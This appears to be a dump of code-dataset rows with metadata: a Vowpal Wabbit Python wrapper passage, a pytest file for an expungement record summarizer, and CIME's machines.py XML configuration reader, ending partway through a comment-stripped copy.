class cost_sensitive_label(abstract_label):
    """Cost-sensitive multiclass label: a list of per-class cost entries."""
    class wclass:
        def __init__(self, label, cost=0., partial_prediction=0., wap_value=0.):
            self.label = label
            self.cost = cost
            self.partial_prediction = partial_prediction
            self.wap_value = wap_value

    def __init__(self, costs=None, prediction=0):
        abstract_label.__init__(self)
        # bug fix: the original used a shared mutable default (costs=[])
        self.costs = [] if costs is None else costs
        self.prediction = prediction

    def from_example(self, ex):
        """Read the cost-sensitive fields out of a VW example."""
        self.prediction = ex.get_costsensitive_prediction()
        self.costs = []
        # bug fixes: the num-costs accessor must be *called* (it was
        # passed to range un-invoked), and wclass is a nested class so
        # it must be referenced through self, not as a global.
        # NOTE(review): the per-cost accessors are called without the
        # loop index i -- confirm against the pylibvw API.
        for i in range(ex.get_costsensitive_num_costs()):
            wc = self.wclass(ex.get_costsensitive_class(),
                             ex.get_costsensitive_cost(),
                             ex.get_costsensitive_partial_prediction(),
                             ex.get_costsensitive_wap_value())
            self.costs.append(wc)

    def __str__(self):
        # bug fix: the closing bracket was missing
        return '[' + ' '.join([str(c.label) + ':' + str(c.cost) for c in self.costs]) + ']'
class cbandits_label(abstract_label):
    """Contextual-bandits label: a list of per-action cost/probability entries."""
    class wclass:
        def __init__(self, label, cost=0., partial_prediction=0., probability=0.):
            self.label = label
            self.cost = cost
            self.partial_prediction = partial_prediction
            self.probability = probability

    def __init__(self, costs=None, prediction=0):
        abstract_label.__init__(self)
        # bug fix: the original used a shared mutable default (costs=[])
        self.costs = [] if costs is None else costs
        self.prediction = prediction

    def from_example(self, ex):
        """Read the contextual-bandits fields out of a VW example."""
        self.prediction = ex.get_cbandits_prediction()
        self.costs = []
        # bug fixes: the num-costs accessor must be *called* (it was
        # passed to range un-invoked), and wclass is a nested class so
        # it must be referenced through self, not as a global.
        # NOTE(review): the per-cost accessors are called without the
        # loop index i -- confirm against the pylibvw API.
        for i in range(ex.get_cbandits_num_costs()):
            wc = self.wclass(ex.get_cbandits_class(),
                             ex.get_cbandits_cost(),
                             ex.get_cbandits_partial_prediction(),
                             ex.get_cbandits_probability())
            self.costs.append(wc)

    def __str__(self):
        # bug fix: the closing bracket was missing
        return '[' + ' '.join([str(c.label) + ':' + str(c.cost) for c in self.costs]) + ']'
class example(pylibvw.example):
    """High-level wrapper around pylibvw.example.

    Tracks whether VW's setup_example has been run (setup_done) so that
    features can safely be pushed/popped before learning, and exposes
    namespace-level access via __getitem__.
    """
    def __init__(self, vw, initStringOrDict=None, labelType=pylibvw.vw.lDefault):
        # unfold lazily-constructed initializers (zero-arg callables)
        while hasattr(initStringOrDict, '__call__'):
            initStringOrDict = initStringOrDict()
        if initStringOrDict is None:
            pylibvw.example.__init__(self, vw, labelType)
            self.setup_done = False
        elif isinstance(initStringOrDict, str):
            # VW parses the string itself; the example comes back set up
            pylibvw.example.__init__(self, vw, labelType, initStringOrDict)
            self.setup_done = True
        elif isinstance(initStringOrDict, dict):
            pylibvw.example.__init__(self, vw, labelType)
            self.vw = vw
            self.stride = vw.get_stride()
            self.finished = False
            self.push_feature_dict(vw, initStringOrDict)
            self.setup_done = False
        else:
            raise TypeError('expecting string or dict as argument for example construction')
        self.vw = vw
        self.stride = vw.get_stride()
        self.finished = False
        self.labelType = labelType

    def __del__(self):
        self.finish()

    def __enter__(self):
        return self

    def __exit__(self,typ,value,traceback):
        # context-manager exit: finish the example, swallow nothing
        self.finish()
        return typ is None

    def get_ns(self, id):
        """Coerce id (index, string, or namespace_id) to a namespace_id."""
        if isinstance(id, namespace_id):
            return id
        else:
            return namespace_id(self, id)

    def __getitem__(self, id):
        """ex[ns] returns an example_namespace view for that namespace."""
        return example_namespace(self, self.get_ns(id))

    def feature(self, ns, i):
        """Return the i-th feature hash in namespace ns."""
        ns = self.get_ns(ns) # guaranteed to be a single character
        f = pylibvw.example.feature(self, ns.ord_ns, i)
        if self.setup_done:
            # undo VW's internal offset/striding once the example is set up
            f = (f - self.get_ft_offset()) / self.stride
        return f

    def feature_weight(self, ns, i):
        """Return the value of the i-th feature in namespace ns."""
        return pylibvw.example.feature_weight(self, self.get_ns(ns).ord_ns, i)

    def set_label_string(self, string):
        """Set this example's label from its VW string representation."""
        pylibvw.example.set_label_string(self, self.vw, string, self.labelType)

    def setup_example(self):
        """Run VW's setup on this example; required before learning."""
        if self.setup_done:
            raise Exception('trying to setup_example on an example that is already setup')
        self.vw.setup_example(self)
        self.setup_done = True

    def unsetup_example(self):
        """Undo setup so features can be modified again."""
        if not self.setup_done:
            raise Exception('trying to unsetup_example that has not yet been setup')
        self.vw.unsetup_example(self)
        self.setup_done = False

    def learn(self):
        """Set the example up if needed, then learn on it."""
        if not self.setup_done:
            self.setup_example()
        self.vw.learn(self)

    def sum_feat_sq(self, ns):
        """Sum of squared feature values in namespace ns."""
        return pylibvw.example.sum_feat_sq(self, self.get_ns(ns).ord_ns)

    def num_features_in(self, ns):
        """Number of features currently in namespace ns."""
        return pylibvw.example.num_features_in(self, self.get_ns(ns).ord_ns)

    def get_feature_id(self, ns, feature, ns_hash=None):
        """Resolve a feature (int passes through; str gets hashed) to an id."""
        if isinstance(feature, int):
            return feature
        if isinstance(feature, str):
            if ns_hash is None:
                ns_hash = self.vw.hash_space( self.get_ns(ns).ns )
            return self.vw.hash_feature(feature, ns_hash)
        raise Exception("cannot extract feature of type: " + str(type(feature)))

    # NOTE: all mutators below first unsetup the example if needed, since
    # features cannot be changed on a set-up example.
    def push_hashed_feature(self, ns, f, v=1.):
        if self.setup_done: self.unsetup_example();
        pylibvw.example.push_hashed_feature(self, self.get_ns(ns).ord_ns, f, v)

    def push_feature(self, ns, feature, v=1., ns_hash=None):
        f = self.get_feature_id(ns, feature, ns_hash)
        self.push_hashed_feature(ns, f, v)

    def pop_feature(self, ns):
        if self.setup_done: self.unsetup_example();
        return pylibvw.example.pop_feature(self, self.get_ns(ns).ord_ns)

    def push_namespace(self, ns):
        if self.setup_done: self.unsetup_example();
        pylibvw.example.push_namespace(self, self.get_ns(ns).ord_ns)

    def pop_namespace(self):
        if self.setup_done: self.unsetup_example();
        return pylibvw.example.pop_namespace(self)

    def ensure_namespace_exists(self, ns):
        if self.setup_done: self.unsetup_example();
        return pylibvw.example.ensure_namespace_exists(self, self.get_ns(ns).ord_ns)

    def push_features(self, ns, featureList):
        """Append a list of features to namespace ns."""
        ns = self.get_ns(ns)
        self.ensure_namespace_exists(ns)
        self.push_feature_list(self.vw, ns.ord_ns, featureList)   # much faster just to do it in C++
        # ns_hash = self.vw.hash_space( ns.ns )
        # for feature in featureList:
        #     if isinstance(feature, int) or isinstance(feature, str):
        #         f = feature
        #         v = 1.
        #     elif isinstance(feature, tuple) and len(feature) == 2 and (isinstance(feature[0], int) or isinstance(feature[0], str)) and (isinstance(feature[1], int) or isinstance(feature[1], float)):
        #         f = feature[0]
        #         v = feature[1]
        #     else:
        #         raise Exception('malformed feature to push of type: ' + str(type(feature)))
        #     self.push_feature(ns, f, v, ns_hash)

    def finish(self):
        """Return this example to VW's pool; safe to call repeatedly."""
        if not self.finished:
            self.vw.finish_example(self)
            self.finished = True

    def iter_features(self):
        """Yield every (feature, value) pair across all namespaces."""
        for ns_id in range( self.num_namespaces() ): # iterate over every namespace
            ns = self.get_ns(ns_id)
            for i in range(self.num_features_in(ns)):
                f = self.feature(ns, i)
                v = self.feature_weight(ns, i)
                yield f,v

    def get_label(self, label_class=simple_label):
        """Construct a label of the given class from this example."""
        return label_class(self)

    def get_topics(self):
        """Return per-topic LDA predictions, or None if LDA is not enabled."""
        n = self.vw.lda()
        if n > 0:
            return [self.get_topic_prediction(i) for i in range(n)]
        else:
            return None
#help(example)
| true | true |
f725dd2723a8f6af9c7f472d8dd8cc02232f81ab | 5,239 | py | Python | src/backend/tests/models/test_record_summarizer.py | Ark20/recordexpungPDX | 2b76b3f5284e8ce572942cc58c9a4577442036fe | [
"MIT"
] | null | null | null | src/backend/tests/models/test_record_summarizer.py | Ark20/recordexpungPDX | 2b76b3f5284e8ce572942cc58c9a4577442036fe | [
"MIT"
] | null | null | null | src/backend/tests/models/test_record_summarizer.py | Ark20/recordexpungPDX | 2b76b3f5284e8ce572942cc58c9a4577442036fe | [
"MIT"
] | null | null | null | from expungeservice.models.disposition import DispositionCreator
from expungeservice.record_merger import RecordMerger
from expungeservice.record_summarizer import RecordSummarizer
from expungeservice.expunger import Expunger
from expungeservice.models.record import Record
from tests.factories.case_factory import CaseFactory
from tests.factories.charge_factory import ChargeFactory
from expungeservice.util import DateWithFuture as date
def test_record_summarizer_multiple_cases():
    """Summarize a five-case record and check the totals plus the
    eligibility grouping of every charge."""
    # single conviction, fully eligible
    case_all_eligible = CaseFactory.create(
        case_number="1",
        balance="100.00",
        date_location=["1/1/1995", "Multnomah"],
        charges=tuple(
            [
                ChargeFactory.create(
                    case_number="1",
                    name="Theft of dignity",
                    disposition=DispositionCreator.create(ruling="Convicted", date=date(2010, 1, 1)),
                )
            ]
        ),
    )
    # one eligible charge plus one ineligible Felony Class A
    case_partially_eligible = CaseFactory.create(
        case_number="2",
        balance="200.00",
        date_location=["1/1/1995", "Clackamas"],
        charges=tuple(
            [
                ChargeFactory.create(
                    case_number="2", disposition=DispositionCreator.create(ruling="Convicted", date=date(2010, 1, 1)),
                ),
                ChargeFactory.create(
                    case_number="2",
                    level="Felony Class A",
                    disposition=DispositionCreator.create(ruling="Convicted", date=date(2010, 1, 1)),
                ),
            ]
        ),
    )
    # Felony Class B: eligible only at a future date
    case_possibly_eligible = CaseFactory.create(
        case_number="3",
        balance="300.00",
        date_location=["1/1/1995", "Baker"],
        charges=tuple(
            [
                ChargeFactory.create(
                    case_number="3",
                    level="Felony Class B",
                    disposition=DispositionCreator.create(ruling="Convicted", date=date(2010, 1, 1)),
                )
            ]
        ),
    )
    # Felony Class A convictions: always ineligible
    case_all_ineligible = CaseFactory.create(
        case_number="4",
        balance="400.00",
        date_location=["1/1/1995", "Baker"],
        charges=tuple(
            [
                ChargeFactory.create(
                    case_number="4",
                    level="Felony Class A",
                    disposition=DispositionCreator.create(ruling="Convicted", date=date(2010, 1, 1)),
                )
            ]
        ),
    )
    # same as above but with no balance, exercising the default
    case_all_ineligible_2 = CaseFactory.create(
        case_number="5",
        date_location=["1/1/1995", "Baker"],
        charges=tuple(
            [
                ChargeFactory.create(
                    case_number="5",
                    level="Felony Class A",
                    disposition=DispositionCreator.create(ruling="Convicted", date=date(2010, 1, 1)),
                )
            ]
        ),
    )
    record = Record(
        tuple(
            [
                case_all_eligible,
                case_partially_eligible,
                case_possibly_eligible,
                case_all_ineligible,
                case_all_ineligible_2,
            ]
        )
    )
    # run the full pipeline: expunger analysis -> merge -> summary
    expunger_result = Expunger.run(record)
    merged_record = RecordMerger.merge([record], [expunger_result], [])
    record_summary = RecordSummarizer.summarize(merged_record, {})
    assert record_summary.total_balance_due == 1000.00
    assert record_summary.total_cases == 5
    assert record_summary.total_charges == 6
    # each charge lands in exactly one eligibility bucket
    assert record_summary.eligible_charges_by_date == {
        "Eligible Jan 1, 2030": [
            (
                case_possibly_eligible.charges[0].ambiguous_charge_id,
                "Theft of services (CONVICTED) - Charged Jan 1, " "2010",
            )
        ],
        "Eligible Now": [
            (case_all_eligible.charges[0].ambiguous_charge_id, "Theft of dignity (CONVICTED) - Charged Jan 1, 2010"),
            (
                case_partially_eligible.charges[0].ambiguous_charge_id,
                "Theft of services (CONVICTED) - Charged Jan 1, 2010",
            ),
        ],
        "Ineligible": [
            (
                case_partially_eligible.charges[1].ambiguous_charge_id,
                "Theft of services (CONVICTED) - Charged Jan 1, 2010",
            ),
            (
                case_all_ineligible.charges[0].ambiguous_charge_id,
                "Theft of services (CONVICTED) - Charged Jan 1, 2010",
            ),
            (
                case_all_ineligible_2.charges[0].ambiguous_charge_id,
                "Theft of services (CONVICTED) - Charged Jan 1, 2010",
            ),
        ],
    }
    # NOTE(review): the assertions below are disabled (kept as a bare
    # string literal, which is a no-op statement); re-enable or delete
    # once the shape of county_balances is settled.
    """
    assert record_summary.county_balances["Baker"] == 700.00
    assert record_summary.county_balances["Multnomah"] == 100.00
    assert record_summary.county_balances["Clackamas"] == 200.00
    """
def test_record_summarizer_no_cases():
    """An empty record summarizes to all-zero totals and no charges."""
    record = Record(tuple([]))
    record_summary = RecordSummarizer.summarize(record, {})
    assert record_summary.total_balance_due == 0.00
    assert record_summary.total_cases == 0
    assert record_summary.total_charges == 0
    assert record_summary.county_balances == []
    assert record_summary.eligible_charges_by_date == {}
| 34.24183 | 118 | 0.564993 | from expungeservice.models.disposition import DispositionCreator
from expungeservice.record_merger import RecordMerger
from expungeservice.record_summarizer import RecordSummarizer
from expungeservice.expunger import Expunger
from expungeservice.models.record import Record
from tests.factories.case_factory import CaseFactory
from tests.factories.charge_factory import ChargeFactory
from expungeservice.util import DateWithFuture as date
def test_record_summarizer_multiple_cases():
case_all_eligible = CaseFactory.create(
case_number="1",
balance="100.00",
date_location=["1/1/1995", "Multnomah"],
charges=tuple(
[
ChargeFactory.create(
case_number="1",
name="Theft of dignity",
disposition=DispositionCreator.create(ruling="Convicted", date=date(2010, 1, 1)),
)
]
),
)
case_partially_eligible = CaseFactory.create(
case_number="2",
balance="200.00",
date_location=["1/1/1995", "Clackamas"],
charges=tuple(
[
ChargeFactory.create(
case_number="2", disposition=DispositionCreator.create(ruling="Convicted", date=date(2010, 1, 1)),
),
ChargeFactory.create(
case_number="2",
level="Felony Class A",
disposition=DispositionCreator.create(ruling="Convicted", date=date(2010, 1, 1)),
),
]
),
)
case_possibly_eligible = CaseFactory.create(
case_number="3",
balance="300.00",
date_location=["1/1/1995", "Baker"],
charges=tuple(
[
ChargeFactory.create(
case_number="3",
level="Felony Class B",
disposition=DispositionCreator.create(ruling="Convicted", date=date(2010, 1, 1)),
)
]
),
)
case_all_ineligible = CaseFactory.create(
case_number="4",
balance="400.00",
date_location=["1/1/1995", "Baker"],
charges=tuple(
[
ChargeFactory.create(
case_number="4",
level="Felony Class A",
disposition=DispositionCreator.create(ruling="Convicted", date=date(2010, 1, 1)),
)
]
),
)
case_all_ineligible_2 = CaseFactory.create(
case_number="5",
date_location=["1/1/1995", "Baker"],
charges=tuple(
[
ChargeFactory.create(
case_number="5",
level="Felony Class A",
disposition=DispositionCreator.create(ruling="Convicted", date=date(2010, 1, 1)),
)
]
),
)
record = Record(
tuple(
[
case_all_eligible,
case_partially_eligible,
case_possibly_eligible,
case_all_ineligible,
case_all_ineligible_2,
]
)
)
expunger_result = Expunger.run(record)
merged_record = RecordMerger.merge([record], [expunger_result], [])
record_summary = RecordSummarizer.summarize(merged_record, {})
assert record_summary.total_balance_due == 1000.00
assert record_summary.total_cases == 5
assert record_summary.total_charges == 6
assert record_summary.eligible_charges_by_date == {
"Eligible Jan 1, 2030": [
(
case_possibly_eligible.charges[0].ambiguous_charge_id,
"Theft of services (CONVICTED) - Charged Jan 1, " "2010",
)
],
"Eligible Now": [
(case_all_eligible.charges[0].ambiguous_charge_id, "Theft of dignity (CONVICTED) - Charged Jan 1, 2010"),
(
case_partially_eligible.charges[0].ambiguous_charge_id,
"Theft of services (CONVICTED) - Charged Jan 1, 2010",
),
],
"Ineligible": [
(
case_partially_eligible.charges[1].ambiguous_charge_id,
"Theft of services (CONVICTED) - Charged Jan 1, 2010",
),
(
case_all_ineligible.charges[0].ambiguous_charge_id,
"Theft of services (CONVICTED) - Charged Jan 1, 2010",
),
(
case_all_ineligible_2.charges[0].ambiguous_charge_id,
"Theft of services (CONVICTED) - Charged Jan 1, 2010",
),
],
}
def test_record_summarizer_no_cases():
record = Record(tuple([]))
record_summary = RecordSummarizer.summarize(record, {})
assert record_summary.total_balance_due == 0.00
assert record_summary.total_cases == 0
assert record_summary.total_charges == 0
assert record_summary.county_balances == []
assert record_summary.eligible_charges_by_date == {}
| true | true |
f725dd3b8236c64cc62c4c8f8e6178ceb94eea3c | 32 | py | Python | packages/w3af/w3af/plugins/tests/output/test_console.py | ZooAtmosphereGroup/HelloPackages | 0ccffd33bf927b13d28c8f715ed35004c33465d9 | [
"Apache-2.0"
] | 3 | 2019-04-09T22:59:33.000Z | 2019-06-14T09:23:24.000Z | tools/w3af/w3af/plugins/tests/output/test_console.py | sravani-m/Web-Application-Security-Framework | d9f71538f5cba6fe1d8eabcb26c557565472f6a6 | [
"MIT"
] | null | null | null | tools/w3af/w3af/plugins/tests/output/test_console.py | sravani-m/Web-Application-Security-Framework | d9f71538f5cba6fe1d8eabcb26c557565472f6a6 | [
"MIT"
] | null | null | null | """
@see: test_consoleui.py
"""
| 8 | 23 | 0.59375 | true | true | |
f725dd3e3ae97ac6d8f564d676e5f24bde3c982a | 486 | py | Python | FileStorage/sf_file/urls.py | Thiefxt/FileStorage | db2882b2ea861f4412cb453edef6439501b13705 | [
"MIT"
] | 1 | 2020-07-15T10:02:40.000Z | 2020-07-15T10:02:40.000Z | FileStorage/sf_file/urls.py | Thiefxt/FileStorage | db2882b2ea861f4412cb453edef6439501b13705 | [
"MIT"
] | null | null | null | FileStorage/sf_file/urls.py | Thiefxt/FileStorage | db2882b2ea861f4412cb453edef6439501b13705 | [
"MIT"
] | null | null | null | """
@Author : xiaotao
@Email : 18773993654@163.com
@Lost modifid : 2020/4/24 10:06
@Filename : urls.py
@Description :
@Software : PyCharm
"""
from django.urls import path
from sf_file.views import file_management
urlpatterns = [
path("test", file_management.Test.as_view()), # 测试运行
path("upload", file_management.FileUpload.as_view()), # 文件上传
]
| 25.578947 | 114 | 0.520576 | from django.urls import path
from sf_file.views import file_management
urlpatterns = [
path("test", file_management.Test.as_view()),
path("upload", file_management.FileUpload.as_view()),
]
| true | true |
f725ddb7c782aa8c33226416d2d64b83c212aa9f | 13,370 | py | Python | cime/scripts/lib/CIME/XML/machines.py | cjvogl/E3SM | d8990bc2efda76b6f9096f989eed46bd3ab87463 | [
"FTL",
"zlib-acknowledgement",
"RSA-MD"
] | 1 | 2019-12-11T16:41:13.000Z | 2019-12-11T16:41:13.000Z | cime/scripts/lib/CIME/XML/machines.py | cjvogl/E3SM | d8990bc2efda76b6f9096f989eed46bd3ab87463 | [
"FTL",
"zlib-acknowledgement",
"RSA-MD"
] | null | null | null | cime/scripts/lib/CIME/XML/machines.py | cjvogl/E3SM | d8990bc2efda76b6f9096f989eed46bd3ab87463 | [
"FTL",
"zlib-acknowledgement",
"RSA-MD"
] | null | null | null | """
Interface to the config_machines.xml file. This class inherits from GenericXML.py
"""
from CIME.XML.standard_module_setup import *
from CIME.XML.generic_xml import GenericXML
from CIME.XML.files import Files
from CIME.utils import convert_to_unknown_type, get_cime_config
import socket
logger = logging.getLogger(__name__)
class Machines(GenericXML):
def __init__(self, infile=None, files=None, machine=None):
"""
initialize an object
if a filename is provided it will be used,
otherwise if a files object is provided it will be used
otherwise create a files object from default values
"""
self.machine_node = None
self.machine = None
self.machines_dir = None
schema = None
if files is None:
files = Files()
if infile is None:
infile = files.get_value("MACHINES_SPEC_FILE")
schema = files.get_schema("MACHINES_SPEC_FILE")
logger.debug("Verifying using schema {}".format(schema))
self.machines_dir = os.path.dirname(infile)
GenericXML.__init__(self, infile, schema)
# Append the contents of $HOME/.cime/config_machines.xml if it exists
# This could cause problems if node matchs are repeated when only one is expected
local_infile = os.path.join(os.environ.get("HOME"),".cime","config_machines.xml")
logger.debug("Infile: {}".format(local_infile))
if os.path.exists(local_infile):
GenericXML.read(self, local_infile, schema)
if machine is None:
if "CIME_MACHINE" in os.environ:
machine = os.environ["CIME_MACHINE"]
else:
cime_config = get_cime_config()
if cime_config.has_option("main", "machine"):
machine = cime_config.get("main", "machine")
if machine is None:
machine = self.probe_machine_name()
expect(machine is not None, "Could not initialize machine object from {} or {}".format(infile, local_infile))
self.set_machine(machine)
def get_child(self, name=None, attributes=None, root=None, err_msg=None):
    """Like GenericXML.get_child, but defaulting root to the machine node."""
    if root is None:
        root = self.machine_node
    return super(Machines, self).get_child(name, attributes, root, err_msg)

def get_machines_dir(self):
    """
    Return the directory of the machines file
    """
    return self.machines_dir

def get_machine_name(self):
    """
    Return the name of the machine
    """
    return self.machine
def get_node_names(self):
    """
    Return the names of all the child nodes for the target machine
    """
    # manual append loop replaced with a comprehension
    return [self.name(node) for node in self.get_children(root=self.machine_node)]
def get_first_child_nodes(self, nodename):
    """
    Return the child nodes named nodename for the target machine
    (the original docstring wrongly said "names"; nodes are returned)
    """
    nodes = self.get_children(nodename, root=self.machine_node)
    return nodes
def list_available_machines(self):
    """
    Return a list of machines defined for a given CIME_MODEL
    """
    # manual append loop replaced with a comprehension
    return [self.get(node, "MACH") for node in self.get_children("machine")]
def probe_machine_name(self, warn=True):
    """
    Find a matching regular expression for hostname
    in the NODENAME_REGEX field in the file. First match wins.
    """
    names_not_found = []
    # try the fully-qualified domain name first, then the bare hostname
    nametomatch = socket.getfqdn()
    machine = self._probe_machine_name_one_guess(nametomatch)
    if machine is None:
        names_not_found.append(nametomatch)
        nametomatch = socket.gethostname()
        machine = self._probe_machine_name_one_guess(nametomatch)
        if machine is None:
            names_not_found.append(nametomatch)
            names_not_found_quoted = ["'" + name + "'" for name in names_not_found]
            names_not_found_str = ' or '.join(names_not_found_quoted)
            if warn:
                logger.warning("Could not find machine match for {}".format(names_not_found_str))
    return machine

def _probe_machine_name_one_guess(self, nametomatch):
    """
    Find a matching regular expression for nametomatch in the NODENAME_REGEX
    field in the file. First match wins. Returns None if no match is found.
    """
    machine = None
    nodes = self.get_children("machine")
    for node in nodes:
        machtocheck = self.get(node, "MACH")
        logger.debug("machine is " + machtocheck)
        regex_str_node = self.get_optional_child("NODENAME_REGEX", root=node)
        # fall back to the machine name itself when no regex is given
        regex_str = machtocheck if regex_str_node is None else self.text(regex_str_node)
        if regex_str is not None:
            logger.debug("machine regex string is " + regex_str)
            regex = re.compile(regex_str)
            if regex.match(nametomatch):
                logger.debug("Found machine: {} matches {}".format(machtocheck, nametomatch))
                machine = machtocheck
                break
    return machine
def set_machine(self, machine):
    """
    Sets the machine block in the Machines object

    >>> machobj = Machines(machine="melvin")
    >>> machobj.get_machine_name()
    'melvin'
    >>> machobj.set_machine("trump")
    Traceback (most recent call last):
    ...
    SystemExit: ERROR: No machine trump found
    """
    if machine == "Query":
        # pseudo-machine used for lookups without binding a real node
        self.machine = machine
    elif self.machine != machine or self.machine_node is None:
        self.machine_node = super(Machines,self).get_child("machine", {"MACH" : machine}, err_msg="No machine {} found".format(machine))
        self.machine = machine
    return machine

#pylint: disable=arguments-differ
def get_value(self, name, attributes=None, resolved=True, subgroup=None):
    """
    Get Value of fields in the config_machines.xml file
    """
    expect(self.machine_node is not None, "Machine object has no machine defined")
    expect(subgroup is None, "This class does not support subgroups")
    value = None
    # COMPILER and MPILIB are special, if called without arguments they get the default value from the
    # COMPILERS and MPILIBS lists in the file.
    if name == "COMPILER":
        value = self.get_default_compiler()
    elif name == "MPILIB":
        value = self.get_default_MPIlib(attributes)
    else:
        node = self.get_optional_child(name, root=self.machine_node, attributes=attributes)
        if node is not None:
            value = self.text(node)
    if resolved:
        if value is not None:
            value = self.get_resolved_value(value)
        elif name in os.environ:
            # unresolved names may still be set in the environment
            value = os.environ[name]
        value = convert_to_unknown_type(value)
    return value
def get_field_from_list(self, listname, reqval=None, attributes=None):
    """
    Some of the fields have lists of valid values in the xml: parse the
    list named listname and return its first entry when reqval is not
    provided (or is "UNSET"), reqval itself when it is a valid setting
    for this machine, or None otherwise.
    """
    expect(self.machine_node is not None, "Machine object has no machine defined")
    values = self.get_value(listname, attributes=attributes)
    # if no match with attributes, try without
    if values is None:
        values = self.get_value(listname, attributes=None)
    expect(values is not None,
           "No list found for " + listname + " on machine " + self.machine)
    choices = values.split(",") #pylint: disable=no-member
    if reqval is None or reqval == "UNSET":
        return choices[0]
    return reqval if reqval in choices else None
def get_default_compiler(self):
    """
    Get the compiler to use from the list of COMPILERS
    """
    cime_config = get_cime_config()
    if cime_config.has_option('main','COMPILER'):
        # a user-configured compiler overrides the machine default,
        # but it must still be valid for this machine
        value = cime_config.get('main', 'COMPILER')
        expect(self.is_valid_compiler(value), "User-selected compiler {} is not supported on machine {}".format(value, self.machine))
    else:
        value = self.get_field_from_list("COMPILERS")
    return value

def get_default_MPIlib(self, attributes=None):
    """
    Get the MPILIB to use from the list of MPILIBS
    """
    return self.get_field_from_list("MPILIBS", attributes=attributes)

def is_valid_compiler(self,compiler):
    """
    Check the compiler is valid for the current machine

    >>> machobj = Machines(machine="edison")
    >>> machobj.get_default_compiler()
    'intel'
    >>> machobj.is_valid_compiler("gnu")
    True
    >>> machobj.is_valid_compiler("nag")
    False
    """
    return self.get_field_from_list("COMPILERS", reqval=compiler) is not None

def is_valid_MPIlib(self, mpilib, attributes=None):
    """
    Check the MPILIB is valid for the current machine

    >>> machobj = Machines(machine="edison")
    >>> machobj.is_valid_MPIlib("mpi-serial")
    True
    >>> machobj.is_valid_MPIlib("fake-mpi")
    False
    """
    # mpi-serial is always permitted regardless of the machine's list
    return mpilib == "mpi-serial" or \
        self.get_field_from_list("MPILIBS", reqval=mpilib, attributes=attributes) is not None
def has_batch_system(self):
    """
    Return if this machine has a batch system

    >>> machobj = Machines(machine="edison")
    >>> machobj.has_batch_system()
    True
    >>> machobj.set_machine("melvin")
    'melvin'
    >>> machobj.has_batch_system()
    False
    """
    node = self.get_optional_child("BATCH_SYSTEM", root=self.machine_node)
    if node is None:
        result = False
    else:
        # a present-but-"none" batch system still counts as no batch
        batch_text = self.text(node)
        result = batch_text is not None and batch_text != "none"
    logger.debug("Machine {} has batch: {}".format(self.machine, result))
    return result
def get_suffix(self, suffix_type):
    """Return the default run suffix of the given type, or None if unset."""
    parent = self.get_optional_child("default_run_suffix")
    if parent is None:
        return None
    child = self.get_optional_child(suffix_type, root=parent)
    if child is None:
        return None
    return self.text(child)
def set_value(self, vid, value, subgroup=None, ignore_type=True):
    """Set a value, rooted at the current machine node."""
    tmproot = self.root
    self.root = self.machine_node
    # robustness fix: restore self.root even if the underlying set_value
    # raises; previously an exception left the object permanently rooted
    # at the machine node.
    try:
        result = super(Machines, self).set_value(vid, value, subgroup=subgroup,
                                                 ignore_type=ignore_type)
    finally:
        self.root = tmproot
    return result
def print_values(self):
    """Print a short per-machine summary of every machine to stdout."""
    # write out machines
    machines = self.get_children("machine")
    logger.info("Machines")
    for machine in machines:
        name = self.get(machine, "MACH")
        desc = self.get_child("DESC", root=machine)
        os_ = self.get_child("OS", root=machine)
        compilers = self.get_child("COMPILERS", root=machine)
        max_tasks_per_node = self.get_child("MAX_TASKS_PER_NODE", root=machine)
        max_mpitasks_per_node = self.get_child("MAX_MPITASKS_PER_NODE", root=machine)
        print( " {} : {} ".format(name , self.text(desc)))
        print( " os ", self.text(os_))
        print( " compilers ",self.text(compilers))
        # the PE-count fields are optional per machine
        if max_mpitasks_per_node is not None:
            print(" pes/node ",self.text(max_mpitasks_per_node))
        if max_tasks_per_node is not None:
            print(" max_tasks/node ",self.text(max_tasks_per_node))

def return_values(self):
    """Return a {(machine, field): value} dict describing every machine."""
    # return a dictionary of machine info
    machines = self.get_children("machine")
    mach_dict = dict()
    logger.info("Machines return values")
    for machine in machines:
        name = self.get(machine, "MACH")
        desc = self.get_child("DESC", root=machine)
        mach_dict[(name,"description")] = self.text(desc)
        os_ = self.get_child("OS", root=machine)
        mach_dict[(name,"os")] = self.text(os_)
        compilers = self.get_child("COMPILERS", root=machine)
        mach_dict[(name,"compilers")] = self.text(compilers)
        # the PE-count fields are optional per machine
        max_tasks_per_node = self.get_child("MAX_TASKS_PER_NODE", root=machine)
        if max_tasks_per_node is not None:
            mach_dict[(name,"max_tasks_per_node")] = self.text(max_tasks_per_node)
        max_mpitasks_per_node = self.get_child("MAX_MPITASKS_PER_NODE", root=machine)
        if max_mpitasks_per_node is not None:
            mach_dict[(name,"max_mpitasks_per_node")] = self.text( max_mpitasks_per_node)
    return mach_dict
| 37.55618 | 140 | 0.608153 | from CIME.XML.standard_module_setup import *
from CIME.XML.generic_xml import GenericXML
from CIME.XML.files import Files
from CIME.utils import convert_to_unknown_type, get_cime_config
import socket
logger = logging.getLogger(__name__)
class Machines(GenericXML):
def __init__(self, infile=None, files=None, machine=None):
self.machine_node = None
self.machine = None
self.machines_dir = None
schema = None
if files is None:
files = Files()
if infile is None:
infile = files.get_value("MACHINES_SPEC_FILE")
schema = files.get_schema("MACHINES_SPEC_FILE")
logger.debug("Verifying using schema {}".format(schema))
self.machines_dir = os.path.dirname(infile)
GenericXML.__init__(self, infile, schema)
local_infile = os.path.join(os.environ.get("HOME"),".cime","config_machines.xml")
logger.debug("Infile: {}".format(local_infile))
if os.path.exists(local_infile):
GenericXML.read(self, local_infile, schema)
if machine is None:
if "CIME_MACHINE" in os.environ:
machine = os.environ["CIME_MACHINE"]
else:
cime_config = get_cime_config()
if cime_config.has_option("main", "machine"):
machine = cime_config.get("main", "machine")
if machine is None:
machine = self.probe_machine_name()
expect(machine is not None, "Could not initialize machine object from {} or {}".format(infile, local_infile))
self.set_machine(machine)
def get_child(self, name=None, attributes=None, root=None, err_msg=None):
if root is None:
root = self.machine_node
return super(Machines, self).get_child(name, attributes, root, err_msg)
def get_machines_dir(self):
return self.machines_dir
def get_machine_name(self):
return self.machine
def get_node_names(self):
nodes = self.get_children(root=self.machine_node)
node_names = []
for node in nodes:
node_names.append(self.name(node))
return node_names
def get_first_child_nodes(self, nodename):
nodes = self.get_children(nodename, root=self.machine_node)
return nodes
def list_available_machines(self):
machines = []
nodes = self.get_children("machine")
for node in nodes:
mach = self.get(node, "MACH")
machines.append(mach)
return machines
def probe_machine_name(self, warn=True):
names_not_found = []
nametomatch = socket.getfqdn()
machine = self._probe_machine_name_one_guess(nametomatch)
